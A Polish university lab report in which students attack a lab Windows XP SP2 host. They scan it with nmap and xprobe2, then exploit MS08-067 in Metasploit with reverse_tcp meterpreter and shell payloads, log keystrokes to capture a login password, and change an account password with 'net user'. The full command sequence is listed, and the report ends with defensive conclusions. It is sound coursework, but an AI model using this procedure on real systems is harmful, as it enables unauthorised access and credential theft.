background image

WOJSKOWA AKADEMIA 

TECHNICZNA 

 

 

 

 

 

 

SPRAWOZDANIE 

PODSTAWY BEZPIECZEŃSTWA INFORMACJI 

LABORATORIUM NR 1 

 

 

 

 

 

 

 

 

Prowadzący: mgr inż. Bartosz Kryński 

Wykonał: Wojciech Węgrecki, Robert Skrzypczyński  

Grupa: I9G2S1 

background image

1.  Cel zadania laboratoryjnego 

Głównym naszym celem było włamanie się na komputer ofiary, przechwycenie jego hasła i 
zmiana. Aby tego dokonać musieliśmy się zapoznać z Linux Backtrack 5, Nmap, Xprobe2 
oraz Metasploit. Linux Backtrack 5 był to system operacyjny z rodziny UNIX, na którym 
wykonywaliśmy wszystkie polecenia. Nmap służył do skanowania portów i wykrywania 
usług w sieci, Xprobe2 – do wykrywania wersji systemu operacyjnego, a metasploit to 
otwarte narzędzie służące do testów penetracyjnych i łamania zabezpieczeń systemów 
teleinformatycznych. Metasploit posiada bazę gotowych exploitów dzięki którym możemy 
dostać się do komputera ofiary.  

2.  Wykonanie zadań powierzonych przez prowadzącego 

Uruchomienie dostarczonego przez prowadzącego zajęcia systemu BackTrack 5, 
ustawienie adresacji IP  z sieci laboratoryjnej 

Poprzez polecenie ifconfig sprawdziliśmy numer IP naszego komputera. 
Nr IP: 10.3.236.42 
Maska: 255.255.255.0 

 
Uruchomienie skanera sieciowego w celu wykrycia informacji dotyczących 
hosta ofiary  

Wykonaliśmy to za pomocą programu Nmap poprzez wpisanie do konsoli: 
nmap –A –sS 10.3.236.*/24 –p 8080 
 
W jej wyniku otrzymaliśmy listę wszystkich hostów znajdujących się w sieci. Mieliśmy  
znaleźć ten, który miał otwarty port 8080. Jedynym hostem spełniającym ten wymóg był  
komputer o adresie IP: 10.3.236.109.  Uzyskaliśmy również informacje o wersji systemu  
Windows na nim zainstalowanym.  
 

 

rys. 1 Screen przedstawiający wykonanie komendy nmap –A –sS 10.3.236.*/24 –p 8080 i 

znalezienie szukanego hosta 

 
 

background image

 

Uruchomienie programu xprobe2 do identyfikacji systemu operacyjnego ofiary  

W celu dokładnego określenia systemu operacyjnego wykorzystaliśmy program xprobe2.  
Po wpisaniu komendy xprobe2 10.3.236.109 uzyskaliśmy informację, że na komputerze 
ofiary zainstalowany jest system operacyjny Microsoft Windows XP SP2.  
 

 

rys. 2 Efekt działania komendy xprobe 

 

 

 

 

background image

Wykorzystanie programu Metasploit w celu przejęcia kontroli nad hostem ofiary 
przy użyciu 2ch kodów payload:   

 

windows/meterpreter/reverse_tcp w celu przechwycenia hasła 

użytkownika logującego się na stacji ofiary  

 

windows/shell/reverse_tcp w celu zmiany hasła użytkownika Clico   

Kolejną częścią zadania laboratoryjnego, było zainstalowanie keyloggera na komputerze  
ofiary i przy jego pomocy uzyskanie hasła. Na początku w terminalu wpisaliśmy komendę 
msfconsole, która powoduje włączenie się interfejsu msf. 
 

 

rys. 3 Uruchomienie msf 

 

Z powodu braku aktualizacji musieliśmy je pobrać i wykonaliśmy to za pomocą polecenia 
msfupdate. 
 

 

rys. 4 Potwierdzenie aktualizacji 

 

background image

Interfejs msf umożliwia dostęp do opcji dostępnych w Metasploit Framework. Na stronie 
programu można znaleźć podatności poszczególnych systemów operacyjnych. Po ich 
wyszukaniu dla Microsoft Windows XP SP 2 okazało się, że jest to : ms08_067_netapi.  
 
Jako payload wykorzystaliśmy moduł  windows/meterpreter/reverse_tcp. Aby zainstalować 
keyloggera oraz uzyskać hasło logowania użyliśmy następującej sekwencji komend:  
  
1. use exploit/windows/smb/ms08_067_netapi  
2. set RHOST 10.3.236.109 (adres ip komputera ofiary)  
3. set LHOST 10.3.236.42 (adres ip naszego komputera)  
4. set PAYLOAD windows/meterpreter/reverse_tcp (załadowanie payload’a) 
5. exploit  
6. ps –m (wyświetlenie listy wszystkich procesów)  
7. migrate 660 (podsłuchiwanie procesu winlogon.exe)  
8. keyscan_start (włączenie nasłuchiwania wciśniętych klawiszy)  
9. keyscan_dump (przechwycenie ciągu znaków) 
10. keyscan_stop (wyłaczenie nasłuchiwania) 
11. quit 
 
Po tej sekwencji poprosiliśmy prowadzącego o zalogowanie się na swoje konto i w wyniku 
tego działania uzyskaliśmy hasło, którym był ciąg znaków: ala12345.  
 

 

rys. 5 Efekt przechwycenia hasła 

 

 

Następnie należało zmienić hasło na koncie ofiary. W tym celu wykorzystaliśmy tą samą 
podatność systemu Windows XP SP2, z tą różnicą że kodem payload był 
windows/shell/reverse_tcp. Zmiane uzyskaliśmy poprzez komendy: 
 
1.set PAYLOAD windows/shell/reverse_tcp (przeładowanie payload’a) 
2.exploit  
3. net user Clico qaz123 (zmiana hasła na qaz123) 
 

background image

 

rys. 6 Zmiana hasła 

 

3.  Wnioski 

Wykonanie zadania uświadomiło nam jak łatwo można przejąć kontrolę nad czyimś 
komputerem. Nie potrzeba do tego bardzo zaawansowanych programów i technik. Mimo, że 
systemem operacyjnym, na który się włamywaliśmy był Windows XP z Service Pack 2, czyli 
nie taki stary i słaby system to udało nam się to bez większych problemów. Uświadomiło nam 
to jak ważna jest ochrona naszego komputera, jeżeli posiadamy na nim jakieś ważne 
informacje. Aby zabezpieczyć się przed ewentualnym atakiem należy regularnie instalować 
aktualizacje systemu, gdyż zawierają one naprawę znalezionych luk i tym samym zamykamy 
drogę dostępu do naszego komputera. Dodatkowo należy stosować programy antywirusowe 
oraz zapory sieciowe, które znacznie utrudniają lub całkowicie uniemożliwiają atak. 
Większość osób nie zdaje sobie sprawy z tego, że są to narzędzia niezbędne na komputerze 
mającym dostęp do Internetu. Dzięki tak łatwym zabiegom, nie wymagającym zbyt dużo 
czasu możemy ochronić się przed włamaniem do naszego komputera i wiążącymi się z tym 
stratami, zazwyczaj materialnymi.